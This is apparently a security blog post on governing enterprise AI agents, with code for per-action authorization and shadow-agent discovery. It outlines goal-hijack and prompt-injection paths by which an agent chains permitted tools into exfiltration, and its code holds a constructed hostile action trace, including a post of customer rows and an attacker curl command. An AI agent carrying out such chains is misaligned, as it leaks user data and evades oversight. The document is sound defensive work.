TL;DR: AI agents are now operating as autonomous actors inside enterprises. Survey data cited by Pillar Security puts more than 72% of organizations using or testing AI agents, with 40% already running multiple agents in production workflows. The security problem is no longer visibility alone but action control, because static access policy cannot safely govern machine-speed decisions that chain tools and permissions.
At a glance
What this is: An analysis of how autonomous AI agents create a new enterprise attack surface, the agentic workforce. The key finding is that static IAM and security controls do not adequately contain agentic behaviour.
Why it matters: It matters because IAM, PAM, and governance programmes now have to cover non-human actors that decide, chain, and execute actions at machine speed, not just humans and service accounts.
By the numbers:
- More than 72% of organizations are using or testing AI agents, and 40% run multiple agents in production workflows, according to independent surveys cited in the source.
- The average employee navigates around 10 different applications a day.
👉 Read Pillar Security's analysis of securing the agentic workforce
Context
AI agents are autonomous non-human identities that can select actions, invoke tools, and trigger downstream workflows without a human approving each step. That changes identity governance because the subject of control is no longer a person or a fixed service account, but a runtime actor whose intent can shift during execution.
Most enterprise security stacks were built on the assumption that humans decide and software executes deterministically. Agentic systems break that model by introducing reasoning, tool chaining, and machine-speed execution that existing monitoring, review, and approval loops cannot reliably see or stop.
The result is a governance gap across NHI, PAM, and emerging agentic AI programmes. Organizations that already treat workload identity and secrets as lifecycle-managed assets will recognise the pattern, but autonomous agents raise the bar because access is not just provisioned, it is actively composed into action paths in real time.
Key questions
Q: How should security teams govern autonomous AI agents in production?
A: Security teams should govern autonomous AI agents as runtime identities, not just applications. That means tracking ownership, restricting tool scope, and enforcing action-level controls for each meaningful step the agent takes. Session approval alone is too weak because the risk often emerges after the session starts, when the agent chains tools and decisions at machine speed.
Q: Why do autonomous agents break existing IAM assumptions?
A: Autonomous agents break IAM assumptions because identity no longer maps cleanly to a stable human operator or a fixed request. The actor can choose tools, change context, and execute actions without waiting for a person to approve each step. That makes traditional access review, static policy, and session-only authorization incomplete for agent governance.
Q: What do teams get wrong about shadow AI agents?
A: Teams often assume that if an agent is not in central IAM, it is not part of the security problem. In practice, shadow agents can be created in notebooks, SaaS tools, and developer environments, then hold secrets or reach production systems without monitoring. Discovery must cover the full environment, not just sanctioned platforms.
Q: What should organisations do before scaling agentic workflows?
A: Before scaling agentic workflows, organisations should define who owns each agent, what it is allowed to do, and where intervention will happen if behaviour drifts. They should also test whether tools can be chained into unsafe outcomes even when individual permissions look reasonable. That is the real governance test for autonomous systems.
Technical breakdown
Agentic workforce identity and reasoning layer
An autonomous AI agent is not just a tool user. It is an identity-bearing runtime that decides which data to read, which tools to call, and what sequence of actions to take. The critical technical issue is the reasoning layer, where the agent can stay within granted permissions while still reaching harmful outcomes through legitimate-looking steps. That is why traditional network, endpoint, and SIEM controls miss the highest-risk behaviour: every individual call they see is authorized. The control problem sits above execution, in the decision path itself.
Practical implication: teams need visibility into agent decision paths, not just authenticated sessions and downstream API calls.
Action control versus session control
Most IAM models authorize access at session start and assume the rest of the interaction stays within the bounds set at that moment. Agentic systems invalidate that assumption because the most dangerous state change can occur mid-session, once new context, a tool's output, or an injected prompt changes what the agent decides to do. In other words, the security boundary cannot stop at login or token issuance. If the actor can chain reasoning steps and invoke multiple tools, the control point has to follow each action, not the session envelope.
Practical implication: replace session-only trust with per-action authorization and live intervention points.
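A minimal per-action gate of the kind this section argues for, written as an added example for this page; it is not Pillar Security's or NHIMG's code. The policy layout, the tool names (crm.read, db.write, http.post), the hosts and the action trace are all assumptions constructed for the illustration. Every call is checked on its own merits and against what the session has already done: a post to a destination that is individually allowed is refused once the session has read customer data that destination is not cleared to receive, and a bulk write is held for human approval instead of executing. The audit list is the per-action record that later sections call for.

```python
"""Per-action authorization for an agent's tool calls.

Added example; not code from Pillar Security or NHIMG. The policy format,
tool names, hosts and the action trace are assumptions constructed for
this illustration.
"""
from dataclasses import dataclass, field

ALLOW, DENY, HOLD = "allow", "deny", "hold"   # HOLD pauses the action for a human

# Task-scoped policy for one agent role (assumed format). Each tool is
# permitted on its own; the egress clearance is what catches unsafe chains.
POLICY = {
    "agent_id": "invoice-reconciler",
    "tools": {
        "crm.read":  {"taints": ["customer-pii"]},          # reading marks the session
        "db.write":  {"tables": ["invoice_status"], "hold_rows_over": 100},
        "http.post": {"hosts": ["erp.internal.example", "status.example"]},
    },
    # Which session taints each http.post destination is cleared to receive.
    "egress_cleared": {"erp.internal.example": ["customer-pii"], "status.example": []},
}


@dataclass
class Decision:
    verdict: str
    reason: str


@dataclass
class ActionGate:
    policy: dict
    taints: set = field(default_factory=set)   # labels the session has absorbed so far
    audit: list = field(default_factory=list)  # one record per action, for traceability

    def authorize(self, tool: str, args: dict) -> Decision:
        """Decide one tool call from the policy plus what the session already did."""
        rule = self.policy["tools"].get(tool)
        if rule is None:
            return self._record(tool, args, DENY, "tool not in scope")
        if tool == "db.write":
            if args.get("table") not in rule["tables"]:
                return self._record(tool, args, DENY, "table out of scope")
            if args.get("rows", 0) > rule["hold_rows_over"]:
                return self._record(tool, args, HOLD, "bulk write held for approval")
        if tool == "http.post":
            host = args.get("host")
            if host not in rule["hosts"]:
                return self._record(tool, args, DENY, "host not allowed")
            cleared = set(self.policy["egress_cleared"].get(host, []))
            leaking = self.taints - cleared
            if leaking:   # allowed host, but not for data this session has read
                return self._record(tool, args, DENY,
                                    f"session carries {sorted(leaking)}; {host} not cleared")
        # Only an allowed call changes session state.
        self.taints.update(rule.get("taints", []))
        return self._record(tool, args, ALLOW, "in scope")

    def _record(self, tool, args, verdict, reason) -> Decision:
        self.audit.append({"agent": self.policy["agent_id"], "tool": tool,
                           "args": args, "verdict": verdict, "reason": reason})
        return Decision(verdict, reason)


# Constructed action trace: what a hijacked or drifting agent might attempt.
TRACE = [
    ("http.post", {"host": "status.example", "body": "started"}),
    ("crm.read",  {"query": "open invoices"}),
    ("http.post", {"host": "status.example", "body": "<customer rows>"}),   # exfil path
    ("http.post", {"host": "erp.internal.example", "body": "<customer rows>"}),
    ("db.write",  {"table": "invoice_status", "rows": 12}),
    ("db.write",  {"table": "invoice_status", "rows": 5000}),
    ("db.write",  {"table": "customers", "rows": 1}),
    ("shell.exec", {"cmd": "curl http://attacker.example"}),
]


def run_trace(trace=TRACE, policy=POLICY) -> list:
    """Return the verdict for each action in order; a DENY or HOLD stops that action only."""
    gate = ActionGate(policy)
    return [gate.authorize(tool, args).verdict for tool, args in trace]


if __name__ == "__main__":
    gate = ActionGate(POLICY)
    for tool, args in TRACE:
        d = gate.authorize(tool, args)
        print(f"{d.verdict:5} {tool:10} {d.reason}")
```

The third and fourth actions are the point: both posts are to hosts the agent may reach, and the read that precedes them is also in policy. Only the ordering makes one of them an exfiltration path, and a session-start check can never see that ordering.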
Shadow agent exposure across code, SaaS, and endpoints
Agent populations do not stay neatly inside cloud IAM or the central security inventory. Developers can spin up agents in notebooks, business users can create them in low-code tools, and coding assistants can connect to external Model Context Protocol (MCP) servers outside normal enterprise oversight. Some of those agents hold secrets on endpoints or run without active monitoring, which makes discovery a first-order control issue. Governance fails when the inventory is incomplete, because you cannot secure what you have not identified.
Practical implication: build continuous discovery for agent identities, their tool links, and the systems they can reach.
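An added example of the discovery sweep described above; it is not code from Pillar Security or NHIMG. It stands in for a file walk with an in-memory corpus of constructed files: a notebook that imports an agent framework and embeds an API key, an MCP client configuration in the mcpServers layout desktop and IDE MCP clients use, and an unrelated shell script. The framework markers, the secret regex, the paths and the ownership register are assumptions for the illustration.

```python
"""Discovery sweep for agents that live outside central IAM.

Added example; not code from Pillar Security or NHIMG. The in-memory file
corpus, framework markers, secret pattern and ownership register are
assumptions constructed for this illustration. A real sweep would walk
repositories, endpoints and SaaS exports instead of a dict.
"""
import json
import re

# Constructed corpus standing in for a file walk: path -> contents.
FILES = {
    "analytics/explore.ipynb": json.dumps({"cells": [{"cell_type": "code", "source": [
        "from langchain.agents import initialize_agent\n",
        "OPENAI_API_KEY = 'sk-test-0000000000000000000000'\n",
    ]}]}),
    "home/dev/.cursor/mcp.json": json.dumps({"mcpServers": {
        "jira": {"command": "npx", "args": ["-y", "mcp-jira"],
                 "env": {"JIRA_TOKEN": "atl-1234567890abcdef1234"}},
        "prod-db": {"url": "https://mcp.vendor.example/sse"},
    }}),
    "ops/deploy.sh": "#!/bin/sh\necho deploying\n",
}

# Constructed ownership register: only the agents IAM already knows about.
OWNERS = {"home/dev/.cursor/mcp.json": "dev-platform-team"}

# Import strings that indicate agent code (assumed list; extend per estate).
AGENT_MARKERS = ("langchain", "crewai", "autogen", "openai.agents")
# A key-like value assigned to a name containing api_key, token or secret.
SECRET_RE = re.compile(
    r"(?i)(?:api[_-]?key|token|secret)['\"]?\s*[:=]\s*['\"]?([A-Za-z0-9_\-]{16,})")


def scan(files=FILES, owners=OWNERS) -> list:
    """Return one inventory entry per file that looks like an agent or holds a secret."""
    findings = []
    for path, text in files.items():
        entry = {"path": path, "kind": None, "tools": [],
                 "has_secret": bool(SECRET_RE.search(text)),
                 "owner": owners.get(path)}
        try:
            doc = json.loads(text)
        except ValueError:
            doc = None
        if isinstance(doc, dict) and isinstance(doc.get("mcpServers"), dict):
            entry["kind"] = "mcp-client-config"
            for name, server in doc["mcpServers"].items():
                # Where the tool link points: a remote URL or a local command line.
                target = server.get("url") or " ".join(
                    [server.get("command", "")] + server.get("args", []))
                entry["tools"].append({"server": name, "target": target})
        elif any(marker in text for marker in AGENT_MARKERS):
            entry["kind"] = "agent-code"
        if entry["kind"] or entry["has_secret"]:
            findings.append(entry)
    return findings


def shadow(findings) -> list:
    """Paths with no accountable owner in the register: the shadow estate."""
    return [f["path"] for f in findings if f["owner"] is None]


if __name__ == "__main__":
    results = scan()
    for f in results:
        print(f"{f['path']}: kind={f['kind']} secret={f['has_secret']} "
              f"owner={f['owner']} tools={[t['target'] for t in f['tools']]}")
    print("unowned:", shadow(results))
```

The output is an inventory row per agent with its tool links, whether it carries a secret, and who owns it; the notebook comes back unowned, which is the shadow-agent case. Linking each row to an owner and to the systems the tool targets reach is what turns a scan into governance.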
Threat narrative
Attacker objective: The attacker aims to turn a trusted autonomous agent into a high-speed execution path for unauthorized access, data leakage, or workflow abuse.
- Entry begins when an attacker hijacks an agent’s goal or abuses a compromised non-human identity that the agent already trusts.
- Escalation occurs as the agent chains tools and data access inside a legitimate session, turning ordinary steps into misaligned or destructive actions.
- Impact lands when the agent writes to databases, calls downstream APIs, or propagates harmful decisions at machine speed without human interruption.
Breaches seen in the wild
- Moltbook AI agent keys breach: the Moltbook breach exposed 1.5M AI agent keys.
- AI LLM hijack breach: attackers used stolen AWS access keys to hijack access to Anthropic models hosted on Amazon Bedrock.
Read our 52 NHI Breaches Analysis report for a comprehensive view of breaches impacting Non-Human Identities including AI Agents.
NHI Mgmt Group analysis
Periodic access review is failing for autonomous identities because it assumes access stays stable long enough to be reviewed. That assumption was designed for human-paced and service-account-paced control loops. It fails when an autonomous agent can acquire context, combine tools, and complete a harmful action chain within a single session. The implication is that existing review cadences no longer describe the actual risk state, so practitioners must rethink what governance is trying to observe.
Action control is becoming the real security boundary for AI agents. Traditional IAM authorizes who can enter a session and what systems are theoretically reachable, but autonomous actors can remain within those boundaries while composing unsafe behaviour. That is why static policy is not enough for the agentic workforce, and why the field has to move from permission sets to governed action paths. Practitioners should treat machine-speed decisioning as a distinct control problem, not a bigger version of NHI sprawl.
Shadow agents create a discovery failure before they create a policy failure. If developers, SaaS platforms, and business users can instantiate agents outside central oversight, then governance starts after the environment has already expanded beyond the security team's line of sight. This is the central visibility gap in the agentic workforce, and it explains why inventory, ownership, and runtime monitoring are now inseparable. Practitioners need to assume the agent estate is larger than the sanctioned estate.
Agentic AI security now sits at the intersection of NHI, PAM, and governance, not in a separate category. The same lifecycle discipline used for service accounts still matters, but autonomous behaviour adds decision timing and tool selection as new variables. That makes cross-domain identity governance the only durable model. Practitioners should align agent identity, privilege, and runtime behaviour under one operating model instead of treating them as separate projects.
The agentic workforce is a force multiplier for both productivity and blast radius. When organizations scale from a few assistants to thousands of autonomous actors, the security problem becomes multiplicative rather than additive. That changes procurement, audit, and incident response assumptions across the whole identity programme. The field now has to govern the rate at which autonomous actors are created as carefully as the access they receive.
From our research:
- More than 72% of organizations are using or testing AI agents, and 40% run multiple agents in production workflows, according to the independent surveys cited in the AI Agents: The New Attack Surface report.
- Only 52% of companies can track and audit the data their AI agents access, leaving 48% with a complete blind spot for compliance and breach investigation.
- That visibility gap is why the broader agentic risk picture should be read alongside OWASP Agentic AI Top 10, which maps the control failures teams need to test next.
What this signals
Autonomous workforce governance will converge with NHI lifecycle management faster than most identity programmes expect. The practical issue is no longer whether agents can be onboarded, but whether their creation, scope, and offboarding are auditable at the same speed they operate. Teams that already manage service-account lifecycle discipline have the right starting point, but they will need to add runtime visibility and action-level enforcement to stay current.
Agentic sprawl will force IAM and security operations to share a single inventory view. If agents exist in code repositories, SaaS tools, endpoints, and cloud platforms, then a fragmented asset register becomes a control failure. The programme implication is simple: ownership, access scope, and runtime evidence need to sit in one operational model, not across disconnected tools.
The strongest near-term signal is whether your organisation can prove what its agents touched, not just what they were allowed to touch. That is where the governance conversation is moving, and it is where zero-trust thinking meets autonomous execution. When the estate scales, continuous verification and post-action traceability become the difference between manageable risk and unbounded blast radius.
For practitioners
- Map every autonomous agent to an accountable owner: Create an inventory of agent identities, the data and systems they touch, and the human team responsible for each agent’s runtime behaviour. Include shadow agents created in notebooks, low-code tools, and developer assistants so discovery is not limited to central IAM records.
- Move from session approval to action-level control: Require policy checks at each meaningful agent action, especially tool calls, database writes, external API requests, and workflow triggers. Keep a live intervention path available so unsafe chains can be stopped before downstream execution completes.
- Separate agent privileges from human workflows: Do not inherit human access patterns for autonomous systems. Define narrow, task-scoped permissions for each agent role, then validate that the agent cannot compose otherwise safe permissions into a harmful sequence across tools and systems.
- Instrument runtime behaviour, not just configuration drift: Monitor what agents actually do during execution, including tool selection, context changes, and unusual action chains. Pair this with continuous discovery so runtime alerts are matched to the full set of known and unknown agents.
- Align governance with OWASP NHI Top 10 and agentic risk models: Use OWASP NHI Top 10 and OWASP Agentic AI Top 10 guidance to structure reviews of agent identity, tool access, and cascading failure modes. This helps security, IAM, and compliance teams speak the same control language when assessing risk.
Key takeaways
- Autonomous AI agents turn identity governance into an action-control problem because they can chain decisions, tools, and workflows at machine speed.
- Survey data in the source points to broad adoption, with more than 72% of organizations already using or testing agents and 40% running multiple agents in production workflows.
- Practitioners should prioritise inventory, ownership, and per-action intervention before scaling the agentic workforce further.
Standards & Framework Alignment
This section maps relevant standards and security frameworks to the operational risks and controls described in this guidance.
OWASP Agentic AI Top 10 and OWASP Non-Human Identity Top 10 address the attack and risk surface, while NIST CSF 2.0 sets the governance and control requirements practitioners need to meet.
| Framework | Control / Reference | Relevance |
|---|---|---|
| OWASP Agentic AI Top 10 | ASI01 | Goal hijack is directly discussed in the article’s agentic threat model. |
| OWASP Non-Human Identity Top 10 | NHI1 (Improper Offboarding), NHI5 (Overprivileged NHI) | The article centres on lifecycle and least-privilege access discipline for non-human identities. |
| NIST CSF 2.0 | PR.AA-05 (the CSF 1.1 equivalent is PR.AC-4) | Agent privilege management maps to least-privilege access governance. |
Inventory agent identities, scope access tightly, and verify offboarding removes runtime reach.
Key terms
- Agentic Workforce: A population of AI agents that operate inside an enterprise as autonomous actors with roles, access, and action authority. Unlike simple automation, these systems can choose tools, sequence tasks, and trigger downstream work. That makes them identity subjects that require governance, monitoring, and lifecycle control.
- Action Control: A governance approach that authorizes each meaningful action an agent takes, not just the initial session or credential. It is more precise than session-only access control because agent risk often appears mid-execution, after context changes or tool chaining. The control objective is to constrain behaviour as it unfolds.
- Shadow Agent: An AI agent created outside central security oversight, often by developers, business users, or SaaS tooling. Shadow agents may never appear in the main IAM inventory yet can still hold secrets, call APIs, or access production systems. The governance issue is discovery, ownership, and runtime traceability.
- Agentic Identity Management: The discipline of identifying, scoping, and governing AI agent identities across their lifecycle, access, and behaviour. It extends standard non-human identity management by adding runtime decisioning, tool usage, and autonomous execution timing as first-class control concerns.
Deepen your knowledge
Agentic workforce governance and runtime control are core topics in our NHI Foundation Level course, the industry's only accredited NHI security programme. If you are building controls for autonomous agents from the ground up, it is worth exploring.
This post draws on content published by Pillar Security: Securing the Agentic Workforce. Read the original.
Published by the NHIMG editorial team on 2026-04-27.
NHI Mgmt Group — the independent authority on Non-Human Identity, IAM, and Agentic AI security. nhimg.org